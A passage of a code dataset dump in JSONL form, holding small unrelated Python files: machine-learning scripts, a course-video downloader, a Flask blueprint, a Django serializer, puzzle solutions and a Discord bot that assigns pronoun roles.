DecisionTreeRegressor\ndtr = DecisionTreeRegressor()\ndtr_params = {\"criterion\": [\"mse\", \"friedman_mse\", \"mae\"],\n \"splitter\": [\"best\", \"random\"]}\ndtr_best_params = best_params(dtr, dtr_params, 3, x_train, y_train)\ndtr_best = DecisionTreeRegressor(**dtr_best_params)\ndtr_result = prediction_reg(dtr_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n\n# KNeighborsClassifier\nknc = KNeighborsClassifier()\nknc_params = {'weights': [\"uniform\", \"distance\"],\n 'p': [1, 2],\n 'n_neighbors': np.arange(1, 40)}\nknc_best_params = best_params(knc, knc_params, 3, x_train_norm, y_train)\nknc_best = KNeighborsClassifier(**knc_best_params)\nknc_result = prediction(knc_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n# # RadiusNeighborsClassifier\n# rnc = RadiusNeighborsClassifier()\n# rnc_params = {}\n# rnc_best_params = best_params(rnc, rnc_params, 3, x_train_norm, y_train)\n# rnc_best = RadiusNeighborsClassifier(**rnc_best_params)\n# rnc_result = prediction(rnc_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n# KNeighborsRegressor\nknr = KNeighborsRegressor()\nknr_params = {'weights': [\"uniform\", \"distance\"],\n 'p': [1, 2],\n 'n_neighbors': np.arange(1, 40)}\nknc_best_params = best_params(knr, knr_params, 3, x_train_norm, y_train)\nknr_best = KNeighborsClassifier(**knc_best_params)\nknr_result = prediction(knr_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n# RadiusNeighborsRegressor\nrnr = RadiusNeighborsRegressor()\nrnr_params = {}\nrnr_best_params = best_params(rnr, rnr_params, 3, x_train_norm, y_train)\nrnr_best = RadiusNeighborsRegressor(**rnr_best_params)\nrnr_result = prediction_reg(rnr_best, x_train_norm, y_train, x_test_norm, y_test, cv=3)\n\n\n\n# RandomForestClassifier\nrfc = RandomForestClassifier()\nrfc_params = {\"n_estimators\": np.arange(10, 15, 1),\n \"min_samples_split\": np.arange(2, 5, 1),\n \"min_samples_leaf\": np.arange(1, 5, 1),\n \"criterion\": [\"gini\", \"entropy\"]}\nrfc_best_params = best_params(rfc, rfc_params, 3, x_train, y_train)\nrfc_best = RandomForestClassifier(**rfc_best_params)\nrfc_result = prediction(rfc_best, x_train, y_train, x_test, y_test, cv=3)\n\n# RandomForestRegressor\nrfr = RandomForestRegressor()\nrfr_params = {\"n_estimators\": np.arange(10, 15, 1),\n \"min_samples_split\": np.arange(2, 5, 1),\n \"min_samples_leaf\": np.arange(1, 5, 1),\n \"criterion\": [\"mse\", \"mae\"]}\nrfr_best_params = best_params(rfr, rfr_params, 3, x_train, y_train)\nrfr_best = RandomForestRegressor(**rfr_best_params)\nrfr_result = prediction_reg(rfr_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n# SVM\nsvm_model = svm.SVC()\nsvm_params = {'kernel': ['linear'],\n 'gamma': ['scale','auto']}\nsvm_best_params = best_params(svm_model, svm_params, 2, x_train, y_train)\nsvm_best = svm.SVC(**svm_best_params)\nsvm_result = prediction(svm_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n# Bayes\nbayes_model = GaussianNB()\nbayes_params = {'priors': None\n #'var_smoothing': [1e-9]\n }\nbayes_best_params = best_params(bayes_model, bayes_params, 2, x_train, y_train)\nbayes_best = svm.SVC(**bayes_best_params)\nbayes_result = prediction(bayes_best, x_train, y_train, x_test, y_test, cv=3)\n\n\n\n\nall_results = [['DecisionTreeClassifier', *dtc_result],\n ['DecisionTreeRegressor', *dtr_result],\n ['KNeighborsClassifier', *knc_result],\n #['RadiusNeighborsClassifier', *rnc_result],\n ['KNeighborsRegressor',*knr_result],\n ['RadiusNeighborsRegressor',*rnr_result],\n ['RandomForestClassifier', *rfc_result],\n ['RandomForestRegressor', *rfr_result],\n ['SVM', *svm_result],\n ['Byess', *bayes_result]\n ]\n\n\nresult_df = pd.DataFrame(all_results, columns=[\"model\", \"mean_val_score\", \"accuracy_score\", \"score\"])\nprint(result_df)\n","sub_path":"projekt_ml/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"449949879","text":"import requests\n\nfrom .shell import Console, red, white, yellow\nfrom .config import cfg\n\nSHL = Console(\"Utils - pushedNotifications\", cls=False)\n\n\ndef send_notification(text: str, debug: bool = False, url_content: str = \"\"):\n\n data = cfg.get(\"pushed_co_config\")\n if data is None:\n SHL.output(f\"{red}./secret_pushed.json not found.{white}\")\n return\n\n if text.strip():\n payload = data['payload']\n payload[\"content\"] = text[:139] # max limit\n\n if url_content.strip():\n payload[\"content_type\"] = \"url\"\n payload[\"content_extra\"] = url_content\n\n r = requests.post(\"https://api.pushed.co/1/push\", data=payload)\n\n if debug:\n SHL.output(r.text)\n return r\n\n else:\n SHL.output(f\"{yellow}Please provide a text.{white}\")\n","sub_path":"src/utils/pushedNotification.py","file_name":"pushedNotification.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445096499","text":"myinput='''29\n7 20 35 1 29 30 34 27 12 41 28 15 37 14 45 44 3 16 4 0 39 26 36 49 6 18 40 47 33'''\ndatas=myinput.split(\"\\n\")\ndatas.pop(0)\ndatas=list(map(int,datas[0].split()))\nsuits = ['Clubs', 'Spades', 'Diamonds', 'Hearts']\nranks = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace']\ndef count_value(item):\n\tsuit_value=item//13\n\trank_value=item%13\n\tprint(\"{}-of-{}\".format(ranks[rank_value],suits[suit_value]),end=\" \")\nfor elements in datas:\n\tcount_value(elements)\n","sub_path":"Card_Names.py","file_name":"Card_Names.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"69515012","text":"import numpy as np\nimport pandas as pd\nimport math\n\nclass HeartFailure(object):\n\n def __init__(self):\n \"\"\" Class constructor for HeartFailure.\n \"\"\"\n\n def check_if_int(self, data):\n \"\"\" This function determines whether a column Series contains\n values that are all integers or not. Depending on the answer,\n the return type could change.\n \n Arguments:\n data {Series} - a column Series\n Returns:\n There are two options that can be returned:\n 1. Boolean - True or False (If data is all integers).\n 2. Boolean and Vector Array (If data contains at least \n one non-integer value).\n \"\"\"\n # Create a temporary blank list.\n temp = []\n \n # Iterate over the elements in data and check whether they are an \n # integer using the modulo logic. If the data is not an integer,\n # add the index of that element to the list called temp.\n for x in range(len(data)):\n if data[x] % 1 != 0:\n temp.append(x)\n \n # Assume that all values are integers.\n is_int = True\n \n # Check whether the count of temp list exceeds 0. If it does,\n # then it means that there is an element that is not an integer.\n # Then convert the temp list into an array.\n if len(temp) > 0:\n is_int = False\n index = np.array(temp)\n \n # This conditional statement will return only a Boolean value if\n # data is all integers. Otherwise, it will also return an array of \n # the indeces where there are non-integer values.\n if is_int == True:\n return is_int\n else:\n return [is_int, index]\n \n def drop_outliers(self, data, field):\n \"\"\"\n \"\"\"\n \n distance = 1.5 * (np.percentile(data[field], 75) - np.percentile(data[field], 25))\n \n data.drop(data[data[field] > distance + np.percentile(data[field], 75)].index, inplace=True)\n data.drop(data[data[field] < np.percentile(data[field], 25) - distance].index, inplace=True)\n \n def get_mean_difference(self, data):\n \"\"\" This function gets the difference between the means of two\n groups.\n \n Arguments:\n data {DataFrame}\n Returns:\n means {Series} - contains the difference of means for the\n groups.\n \"\"\"\n # Create a temporary blank list.\n temp = []\n\n # Get the number of columns in the DataFrame.\n col = data.shape[1]\n\n # Iterate the number of columns and only select the column having\n # the data for means. Since there is only two groups, the subtraction\n # will be hardcoded. There are two possible scenarios where the first\n # mean is larger than the second mean or vise versa. When the difference\n # is acquired, add it to the temporary list.\n for x in range(col):\n if x % 2 == 0:\n if data.loc[0][x] >= data.loc[1][x]:\n diff = data.loc[0][x] - data.loc[1][x]\n temp.append(diff)\n elif data.loc[0][x] < data.loc[1][x]: \n diff = data.loc[1][x] - data.loc[0][x]\n temp.append(diff)\n\n # Convert the list to a Series.\n means = pd.Series(temp)\n\n return means\n \n def get_month(self, data):\n \"\"\" This function returns the month given by days.\n \n Arguments:\n series {Series} - a column Series\n dropped {list}\n Returns:\n result {Series} - a column Series\n \"\"\"\n\n # Create two empty list.\n month = []\n \n # Get the length of data.\n total_size = len(data)\n\n # Iterate over the elements and check what month does the time \n # belong in the 2015. \n for x in range(total_size):\n if data.values[x] >= 1 and data.values[x] <= 31:\n month.append(1)\n elif data.values[x] >= 32 and data.values[x] <= 58:\n month.append(2)\n elif data.values[x] >= 59 and data.values[x] <= 89:\n month.append(3)\n elif data.values[x] >= 90 and data.values[x] <= 119:\n month.append(4)\n elif data.values[x] >= 120 and data.values[x] <= 150:\n month.append(5)\n elif data.values[x] >= 151 and data.values[x] <= 180:\n month.append(6)\n elif data.values[x] >= 181 and data.values[x] <= 211:\n month.append(7)\n elif data.values[x] >= 212 and data.values[x] <= 243:\n month.append(8)\n elif data.values[x] >= 244 and data.values[x] <= 273:\n month.append(9)\n elif data.values[x] >= 274 and data.values[x] <= 304:\n month.append(10)\n elif data.values[x] >= 305 and data.values[x] <= 334:\n month.append(11)\n elif data.values[x] >= 335 and data.values[x] <= 365:\n month.append(12)\n\n # Name the series as 'month' and convert list to a Series.\n month = pd.Series(month)\n\n return month\n","sub_path":"heart_failure.py","file_name":"heart_failure.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362481068","text":"print(\"Project Euler - Problem 4\");\n\n# Palindrome checker\ndef isNumPalindrome(number):\n numInStr = str(number);\n\n # Even and odd branching\n leng = len(numInStr);\n if(leng%2 == 0): # Even\n leftStr = numInStr[:int(leng/2)];\n rightStr = numInStr[int(leng/2):];\n if(leftStr == rightStr[::-1]):\n return True;\n else:\n return False;\n else: # Odd\n leftStr = numInStr[:int(leng/2)];\n rightStr = numInStr[int(leng/2 + 1):];\n if(leftStr == rightStr[::-1]):\n return True;\n else:\n return False;\n\n# Main\nbiggestP = 0;\nfor i in range(1, 1000):\n for j in range(1, 1000):\n temp = i*j;\n if(isNumPalindrome(temp)):\n if(temp > biggestP):\n biggestP = temp;\n print(\"Update: biggestP = \" + str(biggestP));\nprint(\"Ans: \" + str(biggestP));\n\n","sub_path":"P4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477048771","text":"# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nimport configparser\nfrom bs4 import BeautifulSoup\n\nimport model\n\ncourse_url = \"\"\n\n# Loading config\nconfig = configparser.ConfigParser()\nconfig.read(\"settings.conf\", encoding=\"utf-8-sig\")\n# Download_Setting\nDownload_Path = config[\"xuetangx\"][\"Download_Path\"]\n\n# Session\nsession = model.login_session(site=\"xuetangx\", conf=config)\n\n\ndef mk_dir(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\nclass VideoInfo:\n sources = []\n sd = hd = \"\"\n\n def load(self, resp_json):\n self.sources = resp_json['sources']\n if resp_json['sources']:\n self.sd = self.sources['quality10'][0]\n self.hd = self.sources['quality20'][0]\n return self\n\n\n# 从用户给的url中寻找课程id\ndef main(course_url):\n if not re.search(r\"courses/([\\w:+-]+)/?\", course_url):\n print(\"No course Id,Please check!\")\n return\n else:\n course_id = re.search(r\"courses/([\\w:+-]+)/?\", course_url).group(1)\n main_page = f\"http://www.xuetangx.com/courses/{course_id}\"\n info = model.out_info(f\"{main_page}/about\", Download_Path)\n main_path = f\"{Download_Path}\\\\{info.path}\"\n\n # 获取课程目录\n menu_raw = session.get(url=\"{0}/courseware\".format(main_page))\n # 目录检查\n if menu_raw.url.find(\"about\") == -1 and menu_raw.url.find(\"login\") == -1: # 成功获取目录\n # 这里有个判断逻辑,根据url判断:\n # 1、如果登陆了,但是没有参加该课程,会跳转到 ../about页面\n # 2、如果未登录(或密码错误),会跳转到http://www.xuetangx.com/accounts/login?next=.. 页面\n menu_bs = BeautifulSoup(menu_raw.text, \"html5lib\")\n chapter = menu_bs.find_all(\"div\", class_=\"chapter\")\n # 获取章节信息\n for week in chapter:\n week_name = week.h3.a.string.strip()\n model.mkdir_p(f\"{main_path}/{week_name}\")\n # week_content = []\n for lesson in week.ul.find_all(\"a\"):\n # 获取课程信息\n lesson_name = lesson.p.string.strip() # 主标题\n lesson_bs = BeautifulSoup(session.get(url=f\"http://www.xuetangx.com{lesson['href']}\").text, \"html5lib\")\n tab_list = {}\n for tab in lesson_bs.find_all(\"a\", role=\"tab\"):\n tab_list[tab.get('id')] = re.search(\"(.+)\", tab.get('title')).group(1)\n for seq in lesson_bs.find_all('div', class_=\"seq_contents\"):\n if re.search(r\"data-type=[\\'\\\"]Video[\\'\\\"]\", seq.text): # 视频\n # seq_name = tab_list[seq.get(\"aria-labelledby\")]\n lesson_ccsource = re.search(r\"data-ccsource=[\\'\\\"](.+)[\\'\\\"]\", seq.text).group(1)\n r = session.get(url=f\"http://www.xuetangx.com/videoid2source/{lesson_ccsource}\")\n video = VideoInfo().load(resp_json=json.loads(r.text))\n if video.sources is not None:\n dllink = video.hd\n if re.search(\"a href=\\\"(.+/download)\\\"\", seq.text):\n srt_dllink = \"http://www.xuetangx.com{0}\".format(\n re.search(\"a href=\\\"(.+/download)\\\"\", seq.text).group(1))\n # print(week_name, lesson_name, dllink, srt_dllink)\n print(\"{2} \\\"{0} {1}.mp4\\\"\".format(week_name, lesson_name, dllink))\n download_file_name = f\"{main_path}/{week_name}/{lesson_name}.mp4\"\n model.resume_download_file(session=session, filename=download_file_name, url=dllink)\n else: # 未登陆成功或者没参加该课程\n print(\"Something Error,You may not Join this course or Enter the wrong password.\")\n return\n else: # 页面无法找到\n print(\"Not find This course\")\n return\n\n\nif __name__ == '__main__':\n main(course_url)\n","sub_path":"xuetangx-dl.py","file_name":"xuetangx-dl.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"447226122","text":"from flask import request\nfrom flask import url_for\nfrom flask import jsonify\nfrom flask import session\nfrom flask import Blueprint\n\nimport inspect\nfrom termcolor import colored\nfrom functools import wraps\n\nfrom ..models import User\n\n# api 是蓝图的名字\nmain = Blueprint('api', __name__)\n\n\n# 通过 session 来获取当前登录的用户\ndef current_user():\n # print('session, debug', session.permanent)\n username = session.get('username', '')\n u = User.query.filter_by(username=username).first()\n return u\n\n\n\ndef log(*args):\n try:\n frame = inspect.getframeinfo(inspect.currentframe().f_back)\n line_number = frame[1]\n for line in frame[3]:\n begin = line.find('(') + 1\n end = line.rfind(')')\n nameList = line[begin:end].split(',')\n for name, value in zip(nameList, args):\n print(''.join([colored(\"debug \", \"blue\"), colored(\"{}\".format(name), attrs=['bold']),\n colored(\" ---> \", \"white\"), colored('{} {} {}'.format(value, type(value), line_number))]))\n except:\n print(colored(\"debug \", \"red\") + \"something wrong\")\n\ndef login_required(f):\n @wraps(f)\n def function(*args, **kwargs):\n if current_user() is None:\n r = {\n 'success': False,\n 'message': '未登录',\n }\n return jsonify(r)\n return f(*args, **kwargs)\n return function\n\nfrom . import tweet\nfrom . import upload_files\nfrom . import user\n","sub_path":"app/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"324679596","text":"\"\"\"\nSome constants which you could use in your code. You can add more constants\nif you want to, but please refrain from deleting any as there might be some\nsample code that could be using these variables.\n\"\"\"\n# exit status of the program\nSUCCESS = 0\nERROR = 1\n\n# some constant values that are being/can be used as dictionary keys to\n# store information or be used as strings to represent an information\n# and also communicate with other machines\n\n# to indicate that the synchronization of criu dump between ACTIVE and STANDBY\n# is complete\nCOMPLETED = \"completed\"\n# the key used as an argument for communicating the dump status\nDUMP = \"dump\"\n# to indicate that the monitoring service is about to start to dump\nDUMPING = \"dumping\"\n# to indicate that the pair is ACTIVE\nACTIVE = \"active\"\n# to indicate that the pair is in STANDBY\nSTANDBY = \"standby\"\n\n# the Process ID of the current program\nPID = \"pid\"\n# the port at which the current program is running\nPORT = \"port\"\n\n# number of seconds the program should sleep\nSLEEP_TIME = 1\n\n# URLS supported by the webserver\nREGISTER_PATH = \"/register\"\nACTIVE_PATH = \"/active\"\nSTANDBY_PATH = \"/standby\"\nCOMPUTE_PATH = \"/compute\"\nDUMPING_PATH = \"/dumping\"\n\n# the param sent with /compute path\nNUM = \"num\"\n\n# some of the status codes for HTTP\nSTATUS_OK = 200\nBAD_GATEWAY = 502\nNOT_FOUND = 404\n","sub_path":"scenario-3.1/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"388554252","text":"import numpy as np\r\nA = {'a':1,'b':0.9,'c':0.85}\r\nB = {'a':0.9,'b':0.7,'c':0.6}\r\nC = dict()\r\nX = np.array([[0.5, 0.1],[0.2, 0.9],[0.8,0.6]])\r\nY = np.array([[0.6,0.4,0.7],[0.5,0.8,0.9]])\r\n_A = {}\r\n_B = {}\r\ndef Union(A,B):\r\n for key in A:\r\n if A[key]>B[key]:\r\n C[key] = A[key]\r\n else:\r\n C[key] = B[key]\r\n print(\"A U B :\",C)\r\n\r\ndef Intersection(A,B, f=0):\r\n for key in A:\r\n if A[key]>>import linreg\nLoading training data...\nDone. Time (min) = 5.025\nLoading teting data...\nDone. Time (min) = 1.488\n>>>linreg.train_and_test(6000)\n2.709085063545118\n\"\"\"\nimport dataloader\nfrom sklearn import linear_model\nfrom sklearn import metrics\nimport pandas as pd\n\ntrain = dataloader.train\ntest = dataloader.test\n\ndef train_and_test(num_features, model_type = 'ols', alpha = 1.0):\n \"\"\"Trains a linear regression model and tests its predictions.\n\n Args: \n num_features: the number of features to filter by spearman coefficient\n model_type: 'ols' - ordinary least squares\n 'ridge' - ridge regression (l2 regularization)\n alpha: parameter for ridge regression, higher alpha means more regularized\n \n Returns: \n test_mae: the mean absolute error (MAE) of the model on the testing data.\n \"\"\"\n indices = dataloader.get_filtered_indices(num_features)\n x_train = train[:,indices]\n y_train = train[:,0]\n x_test = test[:,indices]\n y_test = test[:,0]\n model = linear_model.LinearRegression()\n if model_type == 'ridge':\n model = linear_model.Ridge(alpha = alpha)\n model.fit(x_train, y_train)\n y_pred_test = model.predict(x_test)\n test_mae = metrics.mean_absolute_error(y_pred_test,y_test)\n return test_mae\n \n\ndefault_ns = [2 ** n for n in range(18)]\ndefault_alphas = [n/10 for n in range(1,11)]\ndef test_all(ns = default_ns, alphas = default_alphas):\n \"\"\"Performs a series of tests across a range of num_features and alphas.\n \n Exports results to ../data/linreg.csv.\n \"\"\"\n df = pd.DataFrame()\n df['num_features'] = ns\n test_maes = []\n for n in ns:\n print(f'training OLS with {n} features')\n test_mae = train_and_test(n, 'OLS')\n test_maes.append(test_mae)\n df['ols'] = test_maes\n for alpha in alphas:\n test_maes = []\n for n in ns:\n print(f'training ridge with {n} features and alpha = {alpha}')\n test_mae = train_and_test(n, 'ridge', alpha)\n test_maes.append(test_mae)\n df[f'Ridge (alpha={alpha})'] = test_maes\n df.to_csv('../data/linreg.csv', index=False)\n \n\n\n\n ","sub_path":"src/linreg.py","file_name":"linreg.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"277811448","text":"# -*- coding: utf8 -*-\n'''\nCreated on 10 mars 2015\n\n@author: pyol6775\n'''\n\nfrom core.utils.constants import GROUP_NAME_SUPERVISOR\nfrom core.models import Supervisor\nfrom rest_framework import serializers\nfrom django.contrib.auth.models import Group\nfrom core.serializers.UserSerializer import UserSerializer, UserUpdateSerializer, createUser, updateUser, getEntity_List, inactivateUser\nfrom core.exceptions.exceptionslist import UserCreationFailed, UserUpdateFailed \nfrom core.exceptions.exceptionslist import UserNotExist\nfrom django.core.exceptions import ObjectDoesNotExist\nimport logging\nlogger = logging.getLogger(__name__) \n\nclass SupervisorSerializer(serializers.HyperlinkedModelSerializer):\n user = UserSerializer(required=True)\n class Meta():\n model = Supervisor\n fields = ('id', 'user', 'type')\n \n def create(self, validated_data):\n user_data = validated_data.pop('user')\n env = validated_data.pop('env')\n return createSupervisor(user_data, env)\n \n \nclass SupervisorUpdateSerializer(serializers.HyperlinkedModelSerializer):\n user = UserUpdateSerializer(required=True)\n class Meta():\n model = Supervisor\n fields = ('id', 'user')\n \n def update(self, instance, validated_data):\n return updateSupervisor(instance, validated_data)\n \n \ndef createSupervisor(user_data, env):\n try:\n user = None\n user = createUser(user_data)\n supervisor = Supervisor.objects.create(user=user, env=env )\n s_group = Group.objects.get(name=GROUP_NAME_SUPERVISOR)\n user.groups = [s_group]\n logger.info('create supervisor username={}'.format(user.username))\n supervisor.save()\n return supervisor\n except Exception as e:\n logger.error(e) \n if user:\n user.delete()\n raise UserCreationFailed\n \n\ndef updateSupervisor(instance, validated_data):\n try:\n user_data = validated_data.pop('user')\n user = instance.user\n updateUser(user, user_data)\n instance.save()\n logger.info('update supervisor username={}'.format(user.username))\n return instance\n except Exception as e:\n logger.error(e)\n raise UserUpdateFailed \n\ndef getSupervisorList():\n return getEntity_List(True , Supervisor.objects.all()) \n \n\ndef inactivateSupervisor(pk):\n try:\n supervisor = Supervisor.objects.get(id=pk)\n user = supervisor.user\n logger.info('inactivate supervisor username={}'.format(user.username))\n return inactivateUser(user) \n except ObjectDoesNotExist:\n msg = ('user supervisor, id:{} does not exist.'.format(pk))\n logger.error(msg)\n raise UserNotExist\n \n \n ","sub_path":"project/core/serializers/SupervisorSerializer.py","file_name":"SupervisorSerializer.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"322191755","text":"'''\nCreated on May 29, 2013\n\n@package: ally core http\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides the web name for the path.\n'''\n\nfrom ally.api.operator.type import TypeCall\nfrom ally.container.ioc import injected\nfrom ally.design.processor.attribute import requires, defines, definesIf\nfrom ally.design.processor.context import Context\nfrom ally.design.processor.execution import Abort\nfrom ally.design.processor.handler import HandlerProcessor\nfrom ally.support.util_spec import IDo\nimport logging\nimport re\n\n# --------------------------------------------------------------------\n\nlog = logging.getLogger(__name__)\n\n# --------------------------------------------------------------------\n\nclass Register(Context):\n '''\n The register context.\n '''\n # ---------------------------------------------------------------- Defined\n hintsCall = definesIf(dict)\n # ---------------------------------------------------------------- Required\n invokers = requires(list)\n doSuggest = requires(IDo)\n \nclass Invoker(Context):\n '''\n The invoker context.\n '''\n # ---------------------------------------------------------------- Defined\n path = defines(list)\n # ---------------------------------------------------------------- Required\n call = requires(TypeCall)\n location = requires(str)\n \nclass Element(Context):\n '''\n The element context.\n '''\n # ---------------------------------------------------------------- Required\n name = requires(str)\n \n# --------------------------------------------------------------------\n\n@injected\nclass PathWebNameHandler(HandlerProcessor):\n '''\n Implementation for a processor that provides the web name for path.\n '''\n \n hintName = 'webName'\n # The hint name for the call web name.\n hintDescription = '(string) The name for locating the call, simply put this is the last '\\\n 'name used in the resource path in order to identify the call.'\n # The hint description.\n \n def __init__(self):\n assert isinstance(self.hintName, str), 'Invalid hint name %s' % self.hintName\n assert isinstance(self.hintDescription, str), 'Invalid hint description %s' % self.hintDescription\n super().__init__(Invoker=Invoker, Element=Element)\n\n def process(self, chain, register:Register, **keyargs):\n '''\n @see: HandlerProcessor.process\n \n Provides the domain based on elements models.\n '''\n assert isinstance(register, Register), 'Invalid register %s' % register\n if not register.invokers: return\n \n if Register.hintsCall in register:\n if register.hintsCall is None: register.hintsCall = {}\n register.hintsCall[self.hintName] = self.hintDescription\n \n aborted = []\n for invoker in register.invokers:\n assert isinstance(invoker, Invoker), 'Invalid invoker %s' % invoker\n if not invoker.call: continue # No call to process hints on.\n if not invoker.path: continue # No path to append the web name to.\n assert isinstance(invoker.call, TypeCall), 'Invalid call %s' % invoker.call\n if not self.hintName in invoker.call.hints: continue\n \n webName = invoker.call.hints[self.hintName]\n if not isinstance(webName, str) or not re.match('\\w+$', webName):\n log.error('Cannot use because invalid web name \\'%s\\', can only contain alpha numeric characters at:%s',\n webName, invoker.location)\n aborted.append(invoker)\n break\n \n for el in reversed(invoker.path):\n assert isinstance(el, Element), 'Invalid element %s' % el\n if el.name:\n el.name = '%s%s' % (webName, el.name)\n break\n else:\n assert isinstance(register.doSuggest, IDo), 'Invalid do suggest %s' % register.doSuggest\n register.doSuggest('Could not process the web name at:%s', invoker.location)\n\n if aborted: raise Abort(*aborted) \n","sub_path":"components/ally-core-http/ally/core/http/impl/processor/assembler/path_web_name.py","file_name":"path_web_name.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"333074983","text":"import random\n\nn = random.randint (1,100)\n\nnum = int(input(\"Nº: \"))\n\nx = 1\n\nwhile num != n:\n\t \n\tif num > n:\n\t\tx = x + 1\n\t\tprint(\"Demasiado elevado, tenta um número menor\")\n\t\n\telse:\n\t\tx = x + 1\n\t\tprint(\"Demasiado baixo, tenta um número maior\")\n\t\n\tnum = int(input(\"Outro nº: \"))\n\t\t\nprint(\"Acertaste, o número era\", n)\nprint(\"Precisaste de\", x, \"tentativas\")\n","sub_path":"semana 4/exercicios/acertarrandom.py","file_name":"acertarrandom.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"375825901","text":"class Solution:\n def spellchecker(self, wordlist: List[str], queries: List[str]) -> List[str]:\n table1 = set(wordlist)\n table2 = {word.lower() : word for word in wordlist[::-1]}\n table3 = {}\n for word in wordlist[::-1]:\n temp = []\n for c in word.lower():\n if c in 'aeiou':\n temp.append('#')\n else:\n temp.append(c)\n table3[''.join(temp)] = word\n\n result = [''] * len(queries)\n\n for i in range(len(queries)):\n query = queries[i]\n if query in table1:\n result[i] = query\n elif query.lower() in table2:\n result[i] = table2[query.lower()]\n else:\n temp = list(query.lower())\n for j in range(len(temp)):\n if temp[j] in 'aeiou':\n temp[j] = '#'\n key = ''.join(temp)\n if key in table3:\n result[i] = table3[key]\n \n return result\n","sub_path":"0901-1000/0966-Vowel Spellchecker/0966-Vowel Spellchecker.py","file_name":"0966-Vowel Spellchecker.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"234457739","text":"\r\nimport discord\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport time\r\n\r\npronouns = [\"they/them/theirs\", \"she/her/hers\", \"he/him/his\", \"by name\", \"other\"]\r\n\r\nClient = discord.Client()\r\nclient = commands.Bot(command_prefix = \".\")\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint(\"Ready for action!\")\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.content.startswith(\".list\"):\r\n\t\tawait client.send_message(message.channel, \"```%s```\" % \"\\n\".join(pronouns))\r\n\t\r\n\telif message.content.startswith(\".add\"):\r\n\t\tentered_pronoun = parse_pronoun(message.content[5:].lower())\r\n\t\tif entered_pronoun != \"null\":\r\n\t\t\trole = discord.utils.get(message.server.roles, name=entered_pronoun)\r\n\t\t\tawait client.add_roles(message.author, role)\r\n\t\t\tawait client.send_message(message.channel, \"I did it! I added %s\" % entered_pronoun)\r\n\t\telse:\r\n\t\t\tawait client.send_message(message.channel, \"I don't know that pronoun. Type '.list' to see a list of available roles.\")\r\n\t\r\n\telif message.content.startswith(\".remove\"):\r\n\t\tentered_pronoun = parse_pronoun(message.content[8:].lower())\r\n\t\tif entered_pronoun != \"null\":\r\n\t\t\trole = discord.utils.get(message.server.roles, name=entered_pronoun)\r\n\t\t\tawait client.remove_roles(message.author, role)\r\n\t\t\tawait client.send_message(message.channel, \"I did it! I removed %s\" % entered_pronoun)\r\n\t\telse:\r\n\t\t\tawait client.send_message(message.channel, \"I don't know that pronoun. Type '.list' to see a list of available roles.\")\r\n\r\n\telif message.content.startswith(\".help\"):\r\n\t\tawait client.send_message(message.channel, \"Type '.list' to see a list of pronouns.\\nType '.add [pronoun]' to add assign yourself a pronoun.\\nType '.remove [pronoun]' to remove a pronoun from yourself.\")\r\n\t\r\n\telif message.content.startswith(\".greet\"):\r\n \t\tawait client.send_message(message.channel, \"Welcome! Type '.help' to see how to set your pronouns.\")\r\n\r\n\telif message.content.startswith(\".\"):\r\n\t\tawait client.send_message(message.channel, \"Command not recognized. Type '.help' for a list of commands.\")\t\r\n\r\n\t#Assign: Mod add role to member\r\n\r\ndef parse_pronoun(input):\r\n\tif input.startswith(\"they\"):\r\n\t\tentered_pronoun = \"they/them/theirs\"\r\n\telif input.startswith(\"she\"):\r\n\t\tentered_pronoun = \"she/her/hers\"\r\n\telif input.startswith(\"he\"):\r\n\t\tentered_pronoun = \"he/him/his\"\r\n\telif input.startswith(\"by\"):\r\n\t\tentered_pronoun = \"by name\"\r\n\telif input.startswith(\"other\"):\r\n\t\tentered_pronoun = \"other\"\r\n\telse:\r\n\t\tentered_pronoun = \"null\"\r\n\treturn 